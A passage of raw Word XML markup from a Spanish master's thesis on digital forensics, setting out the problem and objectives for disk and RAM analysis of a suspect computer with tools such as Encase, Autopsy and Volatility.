        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C35F0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="003C35F0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="003C35F0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155728901 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="003C35F0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="003C35F0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Referencia II.</w:t>
      </w:r>
      <w:r w:rsidRPr="003C35F0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="003C35F0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B299AC" w14:textId="77777777" w:rsidR="0086632C" w:rsidRPr="0086632C" w:rsidRDefault="0086632C" w:rsidP="0086632C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086632C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Por, lo expuesto en la introducción del capítulo, se coliga que el problema a resolver es la resolución de las cuestiones solicitadas por el Gerente de la empresa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0480CF" w14:textId="77777777" w:rsidR="0086632C" w:rsidRPr="0086632C" w:rsidRDefault="0086632C" w:rsidP="0086632C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086632C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Una definición idónea que se puede adoptar en el presente Trabajo de Final de Máster (en adelante TFM) es lo indicado en su momento en la propuesta del TFM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B586A27" w14:textId="71CCB5FD" w:rsidR="002135A8" w:rsidRPr="00490E1A" w:rsidRDefault="0086632C" w:rsidP="0086632C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086632C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Solventar las necesidades del gerente de la empresa mediante el análisis forense del disco duro y la captura de memoria de un ordenador personal, en un caso real con un sistema virtualizado, vinculado a una presunta conducta delictiva real. Para ello, se utilizarán herramientas específicas para la localización de las evidencias digitales sobre los discos duros y la memoria que puedan demostrar el presunto delito (Encase, Autopsy</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Autopsy: Herramienta de análisis forense digital de código abierto.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0086632C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, Volatility, o cualquier otra herramienta, o conjunto de herramientas con prestaciones equivalentes). Finalmente, las evidencias localizadas deberán recogerse en un informe ejecutivo o pericial, el cual, además de los aspectos técnicos, deberá tener en cuenta aquellos requisitos procesales necesarios para que el análisis pueda tener validez en un proceso judicial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB784FC" w14:textId="77777777" w:rsidR="002135A8" w:rsidRPr="00490E1A" w:rsidRDefault="002135A8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C208B95" w14:textId="40333BD9" w:rsidR="002135A8" w:rsidRPr="00490E1A" w:rsidRDefault="00D30AE3" w:rsidP="00FE40D2">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc155782497"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1.2</w:t>
      </w:r>
      <w:r w:rsidR="00FE40D2">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
        <w:t>Objetivos.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="538558CD" w14:textId="77777777" w:rsidR="002135A8" w:rsidRDefault="002135A8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52179CD0" w14:textId="397E01DA" w:rsidR="00DE5C26" w:rsidRPr="00DE5C26" w:rsidRDefault="003C35F0" w:rsidP="003C35F0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C35F0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="003C35F0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="003C35F0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155730947 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="003C35F0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="003C35F0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Referencia I.</w:t>
      </w:r>
      <w:r w:rsidRPr="003C35F0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="003C35F0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00DE5C26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000348FB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DE5C26" w:rsidRPr="00DE5C26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00DE5C26" w:rsidRPr="00DE5C26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00DE5C26" w:rsidRPr="00DE5C26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155731518 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidR="00DE5C26" w:rsidRPr="00DE5C26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00DE5C26" w:rsidRPr="00DE5C26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Referencia III.</w:t>
      </w:r>
      <w:r w:rsidR="00DE5C26" w:rsidRPr="00DE5C26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00DE5C26" w:rsidRPr="00DE5C26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFD052F" w14:textId="77777777" w:rsidR="00D30AE3" w:rsidRPr="00D30AE3" w:rsidRDefault="00D30AE3" w:rsidP="00D30AE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D30AE3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Se describe un el siguiente listado de objetivos que se obtienen al analizar el enunciado del TFM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA4C5D3" w14:textId="1D1B10B5" w:rsidR="00D30AE3" w:rsidRPr="001D7290" w:rsidRDefault="00D30AE3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:hanging="927"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D30AE3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Elaboración del Análisis forense de Disco Duro y RAM</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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 w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D30AE3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4845F077" w14:textId="2F627068" w:rsidR="00D30AE3" w:rsidRPr="001D7290" w:rsidRDefault="00D30AE3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:hanging="927"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Realizar una recuperación parcial o total de la información borrada existente en los dispositivos susceptibles de ser analizados (carving</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Carving: En informática, se refiere a la técnica de extraer datos de un conjunto mayor, típicamente en la recuperación de datos."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E26E3A4" w14:textId="0B8DE07A"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Relativo al análisis de la memoria RAM</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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 w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D30AE3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F7DF52" w14:textId="35BB35E9"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 xml:space="preserve">Comprobar la </w:t>
      </w:r>
      <w:r w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>integridad</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Integridad: En informática, se refiere a la precisión y consistencia de los datos a lo largo de su ciclo de vida."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D30AE3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>de la memoria RAM</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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 w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D30AE3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643F3756" w14:textId="03F84EE3"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Comprobar fecha de la captura de la RAM</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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 w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D30AE3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683AC378" w14:textId="5B182826"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lastRenderedPageBreak/>
        <w:t>Determinar la edición y versión de Windows que tiene instalado el sistema operativo del ordenador sobre el cual se ha efectuado la captura de la memoria RAM</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
